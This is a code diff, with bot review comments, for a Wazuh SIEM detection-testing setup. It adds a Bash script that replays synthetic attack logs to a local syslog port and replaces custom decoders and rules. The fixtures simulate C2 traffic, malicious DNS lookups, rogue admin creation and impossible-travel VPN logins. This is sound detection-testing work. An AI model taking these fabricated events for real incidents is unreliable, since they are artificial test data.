+      ;;
170
+    c|appendix-c|c1|c2|c3|c[0-9]-[0-9][0-9])
171
+      echo "${SAMPLES_DIR}/appendix-c-production-samples.log"
172
+      ;;
173
+    *)
174
+      echo "error: unsupported selector '$1'" >&2
175
+      return 1
176
+      ;;
177
+  esac
178
+}
179
+
180
+emit_syslog() {
181
+  local line="$1"
182
+  if [ "${DRY_RUN}" = "1" ]; then
183
+    echo "DRY_RUN -> ${line}"
184
+    return 0
185
+  fi
186
+
187
+  if [ "${DOCKER_SEND}" = "1" ]; then
188
+    if ! printf '%s\n' "${line}" | docker exec -i "${WAZUH_MANAGER_CONTAINER}" bash -lc 'cat > /dev/udp/127.0.0.1/514'; then
189
+      echo "send_failed target=${WAZUH_MANAGER_CONTAINER}:127.0.0.1:514/udp transport=docker-exec" >&2
190
+      if [ "${STRICT_SEND}" = "1" ]; then
191
+        return 1
192
+      fi
193
+    fi
194
+    return 0
195
+  fi
196
+
197
+  if command -v nc >/dev/null 2>&1; then
198
+    if ! printf '%s\n' "${line}" | nc -w "${NC_WAIT_SECONDS}" -u "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
199
+      echo "send_failed target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp transport=nc" >&2
200
+      if [ "${STRICT_SEND}" = "1" ]; then
201
+        return 1
202
+      fi
203
+    fi
204
+  else
205
+    if ! printf '%s\n' "${line}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}"; then
206
+      echo "send_failed target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp transport=devudp" >&2
207
+      if [ "${STRICT_SEND}" = "1" ]; then
208
+        return 1
209
+      fi
210
+    fi
211
+  fi
212
+}
213
+
214
+rand_between() {
215
+  local min max
216
+  min="$1"
217
+  max="$2"
218
+  echo $(( min + RANDOM % (max - min + 1) ))
219
+}
220
+
221
+random_public_ip() {
222
+  local range last
223
+  range="$(rand_between 0 2)"
224
+  last="$(rand_between 2 254)"
225
+  case "$range" in
226
+    0) echo "198.51.100.${last}" ;;
227
+    1) echo "203.0.113.${last}" ;;
228
+    *) echo "192.0.2.${last}" ;;
229
+  esac
230
+}
231
+
232
+random_private_ip() {
233
+  echo "10.$(rand_between 10 30).$(rand_between 1 254).$(rand_between 1 254)"
234
+}
235
+
236
+random_user() {
237
+  local users=(
238
+    "admin01" "analyst01" "helpdesk01" "ops.admin" "jane.doe"
239
+    "svc_backup$" "svc_dbbackup$" "finance.user" "it-admin" "guest"
240
+  )
241
+  echo "${users[$((RANDOM % ${#users[@]}))]}"
242
+}
243
+
244
+random_fgt_model() {
245
+  local models=("FGT40F-Branch01" "FGT60F-Branch01" "FGT80F-Branch01" "FGT501E-DC01")
246
+  echo "${models[$((RANDOM % ${#models[@]}))]}"
247
+}
248
+
249
+random_devid() {
250
+  local n
251
+  n="$(rand_between 10000000 99999999)"
252
+  echo "FGT80FTK${n}"
253
+}
254
+
255
+random_domain() {
256
+  echo "ioc-$(rand_between 1000 9999).malicious.example"
257
+}
258
+
259
+replace_kv() {
260
+  local input key new
261
+  input="$1"
262
+  key="$2"
263
+  new="$3"
264
+  printf '%s' "$input" | sed -E "s#${key}=\"[^\"]*\"#${key}=\"${new}\"#g; s#${key}=([^\" ][^ ]*)#${key}=${new}#g"
265
+}
266
+
267
+mock_windows_json_line() {
268
+  local line src_ip
269
+  line="$1"
270
+  src_ip="$(random_public_ip)"
271
+
272
+  if command -v jq >/dev/null 2>&1; then
273
+    printf '%s' "$line" | jq -c \
274
+      --arg srcip "$src_ip" \
275
+      '
276
+      if (.win.eventdata | type) == "object" then
277
+        .win.eventdata |= (
278
+          if has("subjectUserName") then .subjectUserName = "SYSTEM" else . end |
279
+          if has("workstationName") then .workstationName = ("WS-" + (($srcip|split("."))[3])) else . end |
280
+          if has("ipAddress") then .ipAddress = $srcip else . end
281
+        )
282
+      else
283
+        .
284
+      end
285
+      ' 2>/dev/null || printf '%s' "$line"
286
+  else
287
+    printf '%s' "$line"
288
+  fi
289
+}
290
+
291
+mock_non_json_line() {
292
+  local line now_date now_time now_iso epoch src_pub dst_priv prev_pub devname devid query
293
+  line="$1"
294
+  now_date="$(date '+%Y-%m-%d')"
295
+  now_time="$(date '+%H:%M:%S')"
296
+  now_iso="$(date -u '+%Y-%m-%dT%H:%M:%S.000Z')"
297
+  epoch="$(date '+%s')"
298
+  src_pub="$(random_public_ip)"
299
+  dst_priv="$(random_private_ip)"
300
+  prev_pub="$(random_public_ip)"
301
+  devname="$(random_fgt_model)"
302
+  devid="$(random_devid)"
303
+  query="$(random_domain)"
304
+
305
+  line="$(replace_kv "$line" "date" "$now_date")"
306
+  line="$(replace_kv "$line" "time" "$now_time")"
307
+  line="$(replace_kv "$line" "eventtime" "$epoch")"
308
+  line="$(replace_kv "$line" "devname" "$devname")"
309
+  line="$(replace_kv "$line" "devid" "$devid")"
310
+
311
+  line="$(replace_kv "$line" "srcip" "$src_pub")"
312
+  line="$(replace_kv "$line" "dstip" "$dst_priv")"
313
+  line="$(replace_kv "$line" "src_ip" "$src_pub")"
314
+  line="$(replace_kv "$line" "prev_ip" "$prev_pub")"
315
+
316
+  line="$(replace_kv "$line" "query" "$query")"
317
+
318
+  line="$(replace_kv "$line" "srcport" "$(rand_between 1025 65535)")"
319
+  line="$(replace_kv "$line" "distance_km" "$(rand_between 500 16000)")"
320
+  line="$(replace_kv "$line" "travel_minutes" "$(rand_between 5 180)")"
321
+
322
+  if [[ "$line" =~ ^[0-9]{4}-[0-9]{2}-[0-9]{2}T ]]; then
323
+    line="$(printf '%s' "$line" | sed -E "s#^[0-9]{4}-[0-9]{2}-[0-9]{2}T[^ ]+#${now_iso}#")"
324
+  fi
325
+  line="$(printf '%s' "$line" | sed -E "s#from [0-9]{1,3}(\.[0-9]{1,3}){3}#from ${src_pub}#g")"
326
+  line="$(printf '%s' "$line" | sed -E "s# port [0-9]{2,5}# port $(rand_between 1025 65535)#g")"
327
+
328
+  printf '%s' "$line"
329
+}
330
+
331
+mock_line() {
332
+  local line="$1"
333
+  if [ "$MOCK_VALUES" != "1" ]; then
334
+    printf '%s' "$line"
335
+    return 0
336
+  fi
337
+
338
+  if [[ "$line" =~ ^\{ ]]; then
339
+    mock_windows_json_line "$line"
340
+  else
341
+    mock_non_json_line "$line"
342
+  fi
343
+}
344
+
345
+send_file_once() {
346
+  local file selector line sent current_tag extracted
347
+  file="$1"
348
+  selector="$2"
349
+  sent=0
350
+  current_tag=""
351
+
352
+  while IFS= read -r line || [ -n "$line" ]; do
353
+    if [[ "$line" =~ ^[[:space:]]*#[[:space:]]*([A-Za-z][0-9]-[0-9]{2})([[:space:]]|$) ]]; then
354
+      extracted="${BASH_REMATCH[1]}"
355
+      current_tag="$(normalize "$extracted")"
356
+      continue
357
+    fi
358
+
359
+    if [[ -z "${line// }" ]] || [[ "$line" =~ ^[[:space:]]*# ]]; then
360
+      continue
361
+    fi
362
+
363
+    if selector_matches_tag "$selector" "$current_tag"; then
364
+      line="$(mock_line "$line")"
365
+      emit_syslog "$line"
366
+      sent=$((sent + 1))
367
+      sleep "$DELAY"
368
+    fi
369
+  done < "$file"
370
+
371
+  echo "sent=${sent} file=$(basename "$file") selector=$(normalize "$selector")"
372
+}
373
+
374
+send_guaranteed_hits_once() {
375
+  local selector sent idx tag line
376
+  selector="$1"
377
+  sent=0
378
+
379
+  local tags=(
380
+    "a1-01"
381
+    "a1-02"
382
+    "a2-02"
383
+    "a2-03"
384
+    "a2-05"
385
+    "a2-10"
386
+    "c1-01"
387
+    "c1-01"
388
+  )
389
+
390
+  local lines=(
391
+    "soc_event=dns_ioc event_type=ioc_dns_traffic src_ip=10.26.45.214 query=ioc-2294.malicious.example action=blocked severity=medium"
392
+    "soc_event=dns_ioc event_type=ioc_domain_match src_ip=10.26.45.214 query=bad-c2.example feed=internal_main confidence=high action=alert"
393
+    "date=2026-03-09 time=10:02:04 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079324 vd=\"root\" logid=\"0100044547\" type=\"event\" subtype=\"system\" level=\"warning\" user=\"admin\" action=\"password-change\" ui=\"https(10.20.55.1)\""
394
+    "date=2026-03-09 time=10:02:17 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079337 vd=\"root\" logid=\"0100044548\" type=\"event\" subtype=\"system\" level=\"warning\" user=\"admin\" action=\"create-admin\" target_user=\"soc-backup-admin\""
395
+    "date=2026-03-09 time=10:04:03 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079443 vd=\"root\" logid=\"0100044552\" type=\"event\" subtype=\"system\" level=\"notice\" user=\"admin\" action=\"download-config\" dstip=10.20.50.33"
396
+    "date=2026-03-09 time=10:07:59 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079679 vd=\"root\" logid=\"0000000014\" type=\"traffic\" subtype=\"forward\" level=\"warning\" srcip=10.20.55.50 dstip=203.0.113.60 dstport=443 threat_label=\"known-c2\" action=\"accept\""
397
+    "date=2026-03-09 time=10:31:00 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773081060 vd=\"root\" logid=\"0101037135\" type=\"event\" subtype=\"vpn\" tunneltype=\"ssl\" action=\"ssl-login-success\" user=\"analyst01\" srcip=203.0.113.71 previous_country=TH current_country=US"
398
+    "soc_event=correlation event_type=c1_impossible_travel user=\"analyst01\" src_ip=203.0.113.71 prev_ip=203.0.113.11 prev_country=TH current_country=US distance_km=13890 travel_minutes=18"
399
+  )
400
+
401
+  for idx in "${!lines[@]}"; do
402
+    tag="${tags[$idx]}"
403
+    if selector_matches_tag "$selector" "$tag"; then
404
+      line="$(mock_line "${lines[$idx]}")"
405
+      emit_syslog "$line"
406
+      sent=$((sent + 1))
407
+      sleep "$DELAY"
408
+    fi
409
+  done
410
+
411
+  echo "guaranteed_sent=${sent} selector=$(normalize "$selector")"
412
+}
413
+
414
+EVENT_POOL_READY=0
415
+EVENT_POOL_SELECTOR=""
416
+declare -a EVENT_POOL_TAGS
417
+declare -a EVENT_POOL_LINES
418
+
419
+build_event_pool() {
420
+  local selector file line current_tag extracted idx tag
421
+  selector="$1"
422
+  EVENT_POOL_READY=0
423
+  EVENT_POOL_SELECTOR="$selector"
424
+  EVENT_POOL_TAGS=()
425
+  EVENT_POOL_LINES=()
426
+
427
+  if [ "$INCLUDE_NONALERTS" = "1" ]; then
428
+    for file in "${FILES[@]}"; do
429
+      current_tag=""
430
+      while IFS= read -r line || [ -n "$line" ]; do
431
+        if [[ "$line" =~ ^[[:space:]]*#[[:space:]]*([A-Za-z][0-9]-[0-9]{2})([[:space:]]|$) ]]; then
432
+          extracted="${BASH_REMATCH[1]}"
433
+          current_tag="$(normalize "$extracted")"
434
+          continue
435
+        fi
436
+        if [[ -z "${line// }" ]] || [[ "$line" =~ ^[[:space:]]*# ]]; then
437
+          continue
438
+        fi
439
+        if selector_matches_tag "$selector" "$current_tag"; then
440
+          EVENT_POOL_TAGS+=("$current_tag")
441
+          EVENT_POOL_LINES+=("$line")
442
+        fi
443
+      done < "$file"
444
+    done
445
+  fi
446
+
447
+  if [ "$GUARANTEE_HITS" = "1" ]; then
448
+    local guaranteed_tags=(
449
+      "a1-01" "a1-02" "a2-02" "a2-03" "a2-05" "a2-10" "c1-01" "c1-01"
450
+    )
451
+    local guaranteed_lines=(
452
+      "soc_event=dns_ioc event_type=ioc_dns_traffic src_ip=10.26.45.214 query=ioc-2294.malicious.example action=blocked severity=medium"
453
+      "soc_event=dns_ioc event_type=ioc_domain_match src_ip=10.26.45.214 query=bad-c2.example feed=internal_main confidence=high action=alert"
454
+      "date=2026-03-09 time=10:02:04 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079324 vd=\"root\" logid=\"0100044547\" type=\"event\" subtype=\"system\" level=\"warning\" user=\"admin\" action=\"password-change\" ui=\"https(10.20.55.1)\""
455
+      "date=2026-03-09 time=10:02:17 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079337 vd=\"root\" logid=\"0100044548\" type=\"event\" subtype=\"system\" level=\"warning\" user=\"admin\" action=\"create-admin\" target_user=\"soc-backup-admin\""
456
+      "date=2026-03-09 time=10:04:03 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079443 vd=\"root\" logid=\"0100044552\" type=\"event\" subtype=\"system\" level=\"notice\" user=\"admin\" action=\"download-config\" dstip=10.20.50.33"
457
+      "date=2026-03-09 time=10:07:59 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773079679 vd=\"root\" logid=\"0000000014\" type=\"traffic\" subtype=\"forward\" level=\"warning\" srcip=10.20.55.50 dstip=203.0.113.60 dstport=443 threat_label=\"known-c2\" action=\"accept\""
458
+      "date=2026-03-09 time=10:31:00 devname=\"FGT80F-Branch01\" devid=\"FGT80FTK20000001\" eventtime=1773081060 vd=\"root\" logid=\"0101037135\" type=\"event\" subtype=\"vpn\" tunneltype=\"ssl\" action=\"ssl-login-success\" user=\"analyst01\" srcip=203.0.113.71 previous_country=TH current_country=US"
459
+      "soc_event=correlation event_type=c1_impossible_travel user=\"analyst01\" src_ip=203.0.113.71 prev_ip=203.0.113.11 prev_country=TH current_country=US distance_km=13890 travel_minutes=18"
460
+    )
461
+    for idx in "${!guaranteed_lines[@]}"; do
462
+      tag="${guaranteed_tags[$idx]}"
463
+      if selector_matches_tag "$selector" "$tag"; then
464
+        EVENT_POOL_TAGS+=("$tag")
465
+        EVENT_POOL_LINES+=("${guaranteed_lines[$idx]}")
466
+      fi
467
+    done
468
+  fi
469
+
470
+  EVENT_POOL_READY=1
471
+}
472
+
473
+send_random_event_once() {
474
+  local selector size idx line tag
475
+  selector="$1"
476
+  if [ "$EVENT_POOL_READY" -ne 1 ] || [ "$EVENT_POOL_SELECTOR" != "$selector" ]; then
477
+    build_event_pool "$selector"
478
+  fi
479
+  size="${#EVENT_POOL_LINES[@]}"
480
+  if [ "$size" -eq 0 ]; then
481
+    echo "random_sent=0 selector=$(normalize "$selector")"
482
+    return 0
483
+  fi
484
+  idx=$((RANDOM % size))
485
+  tag="${EVENT_POOL_TAGS[$idx]}"
486
+  line="${EVENT_POOL_LINES[$idx]}"
487
+  line="$(mock_line "$line")"
488
+  emit_syslog "$line"
489
+  echo "random_sent=1 tag=${tag} selector=$(normalize "$selector")"
490
+}
491
+
492
+if ! is_valid_selector "$SELECTOR"; then
493
+  echo "error: selector must be one of all|a|b|c|appendix-a|appendix-b|appendix-c|a1..a4|b1..b3|c1..c3|A1-01..C3-04"
494
+  exit 1
495
+fi
496
+
497
+FILES=()
498
+while IFS= read -r f; do
499
+  [ -n "$f" ] && FILES+=("$f")
500
+done < <(sample_files_for_selector "$SELECTOR")
501
+
502
+for f in "${FILES[@]}"; do
503
+  if [ ! -f "$f" ]; then
504
+    echo "error: missing sample file '$f'"
505
+    exit 1
506
+  fi
507
+done
508
+
509
+echo "selector=${SELECTOR} count=${COUNT} delay=${DELAY}s forever=${FOREVER} dry_run=${DRY_RUN} mock_values=${MOCK_VALUES} guarantee_hits=${GUARANTEE_HITS} random_types=${RANDOM_TYPES} include_nonalerts=${INCLUDE_NONALERTS} docker_send=${DOCKER_SEND} nc_wait=${NC_WAIT_SECONDS}s strict_send=${STRICT_SEND}"
510
+echo "target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
511
+
512
+if [ "$RANDOM_TYPES" = "1" ]; then
513
+  if [ "$FOREVER" -eq 1 ]; then
514
+    loop=1
515
+    while true; do
516
+      send_random_event_once "$SELECTOR"
517
+      echo "loop=${loop} complete"
518
+      loop=$((loop + 1))
519
+      sleep "$DELAY"
520
+    done
521
+  else
522
+    for ((i=1; i<=COUNT; i++)); do
523
+      send_random_event_once "$SELECTOR"
524
+      echo "iteration=${i}/${COUNT} complete"
525
+      sleep "$DELAY"
526
+    done
527
+  fi
528
+elif [ "$FOREVER" -eq 1 ]; then
529
+  loop=1
530
+  while true; do
531
+    for f in "${FILES[@]}"; do
532
+      send_file_once "$f" "$SELECTOR"
533
+    done
534
+    if [ "$GUARANTEE_HITS" = "1" ]; then
535
+      send_guaranteed_hits_once "$SELECTOR"
536
+    fi
537
+    echo "loop=${loop} complete"
538
+    loop=$((loop + 1))
539
+  done
540
+else
541
+  for ((i=1; i<=COUNT; i++)); do
542
+    for f in "${FILES[@]}"; do
543
+      send_file_once "$f" "$SELECTOR"
544
+    done
545
+    if [ "$GUARANTEE_HITS" = "1" ]; then
546
+      send_guaranteed_hits_once "$SELECTOR"
547
+    fi
548
+    echo "iteration=${i}/${COUNT} complete"
549
+  done
550
+fi
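Review bot: `build_event_pool` only reads the sample files when `INCLUDE_NONALERTS` is 1, while the non-random path calls `send_file_once` unconditionally, so `--random-types --no-guarantee-hits` without `--include-nonalerts` builds an empty pool and every iteration prints `random_sent=0` while the script still exits 0. Either load the sample lines into the pool by default or fail fast when the pool is empty after `build_event_pool`, so a run that sent nothing is not mistaken for a passing detection test. The guaranteed tag and line arrays are also duplicated verbatim in `send_guaranteed_hits_once` and `build_event_pool`; declaring them once at file scope keeps the two modes from drifting apart. In `emit_syslog`, the `--docker-send` branch hard-codes `/dev/udp/127.0.0.1/514` and ignores `WAZUH_SYSLOG_PORT`, yet the startup banner still prints `target=${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp`, which misreports where the events went.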

+ 0 - 132
scripts/send-wazuh-test-events.sh

@@ -1,132 +0,0 @@
1
-#!/usr/bin/env bash
2
-set -euo pipefail
3
-
4
-SCENARIO="${1:-all}"
5
-COUNT="${2:-1}"
6
-DELAY="${3:-0.3}"
7
-FOREVER="false"
8
-
9
-for arg in "${@:4}"; do
10
-  case "${arg}" in
11
-    --forever)
12
-      FOREVER="true"
13
-      ;;
14
-    *)
15
-      echo "error: unexpected argument '${arg}'"
16
-      echo "usage: scripts/send-wazuh-test-events.sh [scenario] [count] [delay_seconds] [--forever]"
17
-      exit 1
18
-      ;;
19
-  esac
20
-done
21
-
22
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
23
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
24
-WAZUH_TEST_SRC_IP="${WAZUH_TEST_SRC_IP:-203.0.113.10}"
25
-WAZUH_TEST_DOMAIN="${WAZUH_TEST_DOMAIN:-malicious.example}"
26
-WAZUH_TEST_USER="${WAZUH_TEST_USER:-guest.user}"
27
-
28
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
29
-  echo "error: count must be a positive integer"
30
-  exit 1
31
-fi
32
-
33
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
34
-  echo "error: delay must be numeric (example: 0.5)"
35
-  exit 1
36
-fi
37
-
38
-emit_syslog() {
39
-  local msg="$1"
40
-  local sent="false"
41
-
42
-  if command -v nc >/dev/null 2>&1; then
43
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
44
-      sent="true"
45
-    fi
46
-  fi
47
-
48
-  if [[ "${sent}" != "true" ]]; then
49
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
50
-      sent="true"
51
-    fi
52
-  fi
53
-
54
-  if [[ "${sent}" != "true" ]]; then
55
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
56
-    echo "hint: install netcat or run with bash UDP support (/dev/udp)"
57
-    return 1
58
-  fi
59
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
60
-}
61
-
62
-random_id() {
63
-  printf "%s" "evt-$(date +%s)-$RANDOM-$RANDOM"
64
-}
65
-
66
-send_ioc_dns() {
67
-  local eid
68
-  eid="$(random_id)"
69
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') soc-test soc_mvp_test=true event_id=${eid} event_type=ioc_dns src_ip=${WAZUH_TEST_SRC_IP} query=${WAZUH_TEST_DOMAIN} action=blocked severity=medium"
70
-}
71
-
72
-send_ioc_ips() {
73
-  local eid
74
-  eid="$(random_id)"
75
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') soc-test soc_mvp_test=true event_id=${eid} event_type=ioc_ips src_ip=${WAZUH_TEST_SRC_IP} dst_ip=198.51.100.55 signature='Known C2 Beacon' severity=high"
76
-}
77
-
78
-send_vpn_outside_th() {
79
-  local eid
80
-  eid="$(random_id)"
81
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') soc-test soc_mvp_test=true event_id=${eid} event_type=vpn_geo_anomaly user=${WAZUH_TEST_USER} src_ip=${WAZUH_TEST_SRC_IP} country=US success=true severity=high"
82
-}
83
-
84
-send_windows_auth_fail() {
85
-  local eid
86
-  eid="$(random_id)"
87
-  emit_syslog "<134>$(date '+%b %d %H:%M:%S') soc-test soc_mvp_test=true event_id=${eid} event_type=windows_auth_fail user=${WAZUH_TEST_USER} src_ip=${WAZUH_TEST_SRC_IP} attempts=7 severity=medium"
88
-}
89
-
90
-send_once() {
91
-  case "${SCENARIO}" in
92
-    ioc_dns)
93
-      send_ioc_dns
94
-      ;;
95
-    ioc_ips)
96
-      send_ioc_ips
97
-      ;;
98
-    vpn_outside_th)
99
-      send_vpn_outside_th
100
-      ;;
101
-    windows_auth_fail)
102
-      send_windows_auth_fail
103
-      ;;
104
-    all)
105
-      send_ioc_dns
106
-      send_ioc_ips
107
-      send_vpn_outside_th
108
-      send_windows_auth_fail
109
-      ;;
110
-    *)
111
-      echo "error: unknown scenario '${SCENARIO}'"
112
-      echo "valid: ioc_dns | ioc_ips | vpn_outside_th | windows_auth_fail | all"
113
-      exit 1
114
-      ;;
115
-  esac
116
-}
117
-
118
-if [[ "${FOREVER}" == "true" ]]; then
119
-  echo "running forever with interval ${DELAY}s (Ctrl+C to stop)"
120
-  trap 'echo; echo "stopped"; exit 0' INT TERM
121
-  while true; do
122
-    send_once
123
-    sleep "${DELAY}"
124
-  done
125
-else
126
-  for ((i=1; i<=COUNT; i++)); do
127
-    send_once
128
-    if [[ "${i}" -lt "${COUNT}" ]]; then
129
-      sleep "${DELAY}"
130
-    fi
131
-  done
132
-fi
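Review bot: Deleting this file removes the documented entry point `scripts/send-wazuh-test-events.sh [scenario] [count] [delay_seconds] [--forever]`, so any README, runbook or CI step that still calls it should be updated in the same commit to name the replacement. Its events were tagged `soc_mvp_test=true`, and the decoders added later in this commit prematch on `soc_event=...` instead, so samples captured from this script will no longer decode; say so in the commit message if that is intended.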

+ 13 - 21
wazuh-docker/single-node/config/wazuh_cluster/local_decoder.xml

@@ -1,25 +1,17 @@
1
-<!-- SOC MVP local decoders (minimal production-safe set) -->
1
+<!--
2
+  SOC custom decoders (production-focused baseline)
3
+  - Decodes real correlation payloads produced by SOC Integrator
4
+  - Decodes real DNS IOC payloads
5
+-->
2 6
 
3
-<decoder name="soc-kv-base">
4
-  <prematch>soc_mvp_test=true</prematch>
7
+<decoder name="soc-prod-dns">
8
+  <prematch>soc_event=dns_ioc</prematch>
9
+  <regex type="pcre2">event_type=(\S+)(?:.*?src_ip=([\d.]+))?</regex>
10
+  <order>status, srcip</order>
5 11
 </decoder>
6 12
 
7
-<decoder name="soc-dns-ioc">
8
-  <parent>soc-kv-base</parent>
9
-  <prematch>source=dns</prematch>
10
-</decoder>
11
-
12
-<decoder name="soc-vmware-auth">
13
-  <parent>soc-kv-base</parent>
14
-  <prematch>source=vmware</prematch>
15
-</decoder>
16
-
17
-<decoder name="soc-log-monitor">
18
-  <parent>soc-kv-base</parent>
19
-  <prematch>source=log_monitor</prematch>
20
-</decoder>
21
-
22
-<decoder name="soc-windows-sysmon">
23
-  <parent>soc-kv-base</parent>
24
-  <prematch>source=windows_sysmon</prematch>
13
+<decoder name="soc-prod-integrator">
14
+  <prematch>soc_event=correlation</prematch>
15
+  <regex type="pcre2">event_type=(\S+)(?:.*?user="([^"]+)")?(?:.*?src_ip=([\d.]+))?</regex>
16
+  <order>status, srcuser, srcip</order>
25 17
 </decoder>
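Review bot: Both `<regex>` patterns depend on field order, and because every group after the first is optional they fail silently: in `soc-prod-integrator` a `src_ip=` that appears before `user="..."` is skipped once the `user` group matches, and in both decoders a `src_ip=` ahead of `event_type=` is never captured. Either state the required field order in the header comment or extract each field with its own regex in sibling decoders. Two smaller points: `[\d.]+` only accepts dotted IPv4-style values, so an IPv6 source leaves `srcip` empty, and the unanchored `<prematch>soc_event=dns_ioc</prematch>` claims any line that contains that token anywhere, including inside a free-text field, so consider anchoring it or keying on the program name.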

+ 15 - 305
wazuh-docker/single-node/config/wazuh_cluster/local_rules.xml

@@ -1,311 +1,21 @@
1
-<group name="soc_mvp_test,">
2
-  <!-- Base marker for all synthetic SOC simulation events -->
3
-  <rule id="100200" level="3">
4
-    <match>soc_mvp_test=true</match>
5
-    <description>SOC MVP synthetic test event detected</description>
6
-    <group>soc_mvp_test,syslog,</group>
7
-  </rule>
8
-
9
-  <!-- Proposal-level grouping -->
10
-  <rule id="100210" level="5">
11
-    <if_sid>100200</if_sid>
12
-    <match>usecase_id=A</match>
13
-    <description>Proposal Appendix A simulation event</description>
14
-    <group>soc_mvp_test,proposal_appendix_a,</group>
15
-  </rule>
1
+<!--
2
+  SOC custom local rules (production-focused baseline)
3
+  Rule IDs in this file:
4
+    100250: DNS/IOC decoder anchor (soc-prod-dns)
5
+    100260: soc-integrator correlation decoder anchor (soc-prod-integrator)
6
+-->
7
+<group name="soc_prod_base,">
16 8
 
17
-  <rule id="100220" level="5">
18
-    <if_sid>100200</if_sid>
19
-    <match>usecase_id=B</match>
20
-    <description>Proposal Appendix B simulation event</description>
21
-    <group>soc_mvp_test,proposal_appendix_b,</group>
9
+  <rule id="100250" level="3">
10
+    <decoded_as>soc-prod-dns</decoded_as>
11
+    <description>SOC PROD: DNS/IOC anchor event</description>
12
+    <group>soc_prod_base,dns_ioc,</group>
22 13
   </rule>
23 14
 
24
-  <rule id="100230" level="5">
25
-    <if_sid>100200</if_sid>
26
-    <match>usecase_id=C</match>
27
-    <description>Proposal Appendix C simulation event</description>
28
-    <group>soc_mvp_test,proposal_appendix_c,</group>
15
+  <rule id="100260" level="3">
16
+    <decoded_as>soc-prod-integrator</decoded_as>
17
+    <description>SOC PROD: soc-integrator correlation anchor event</description>
18
+    <group>soc_prod_base,correlation,</group>
29 19
   </rule>
30 20
 
31
-  <!-- Appendix A1 (Medium) -->
32
-  <rule id="100301" level="8"><if_sid>100210</if_sid><match>usecase_id=A1-01</match><description>A1-01 DNS Network Traffic Communicate to Malicious Domain</description><group>soc_mvp_test,appendix_a,a1,ioc,</group></rule>
33
-  <rule id="100302" level="8"><if_sid>100210</if_sid><match>usecase_id=A1-02</match><description>A1-02 DNS Network Traffic Malicious Domain IOCs Detection</description><group>soc_mvp_test,appendix_a,a1,ioc,</group></rule>
34
-
35
-  <!-- Appendix A2 (FortiGate IPS/IDS & Firewall) -->
36
-  <rule id="100311" level="12"><if_sid>100210</if_sid><match>usecase_id=A2-01</match><description>A2-01 Allowed RDP from Public IPs</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
37
-  <rule id="100312" level="12"><if_sid>100210</if_sid><match>usecase_id=A2-02</match><description>A2-02 Firewall Account Admin Password Change</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
38
-  <rule id="100313" level="12"><if_sid>100210</if_sid><match>usecase_id=A2-03</match><description>A2-03 Firewall Account Create Add Admin Account</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
39
-  <rule id="100314" level="12"><if_sid>100210</if_sid><match>usecase_id=A2-04</match><description>A2-04 Firewall Configure Disabled Email Notification</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
40
-  <rule id="100315" level="5"><if_sid>100210</if_sid><match>usecase_id=A2-05</match><description>A2-05 Firewall Configure Download Configure FW</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
41
-  <rule id="100316" level="8"><if_sid>100210</if_sid><match>usecase_id=A2-06</match><description>A2-06 IDS Alert Multiple Critical High</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
42
-  <rule id="100317" level="5"><if_sid>100210</if_sid><match>usecase_id=A2-07</match><description>A2-07 Network Traffic Port Scanning</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
43
-  <rule id="100318" level="8"><if_sid>100210</if_sid><match>usecase_id=A2-08</match><description>A2-08 Network Traffic IOC Detection</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
44
-  <rule id="100319" level="8"><if_sid>100210</if_sid><match>usecase_id=A2-09</match><description>A2-09 Port Scanning from Private IP</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
45
-  <rule id="100320" level="8"><if_sid>100210</if_sid><match>usecase_id=A2-10</match><description>A2-10 Communicate to Malicious IP</description><group>soc_mvp_test,appendix_a,a2,fortigate,</group></rule>
46
-
47
-  <!-- Appendix A3 (FortiGate VPN) -->
48
-  <rule id="100331" level="12"><if_sid>100210</if_sid><match>usecase_id=A3-01</match><description>A3-01 VPN Authentication Success from Guest Account</description><group>soc_mvp_test,appendix_a,a3,vpn,</group></rule>
49
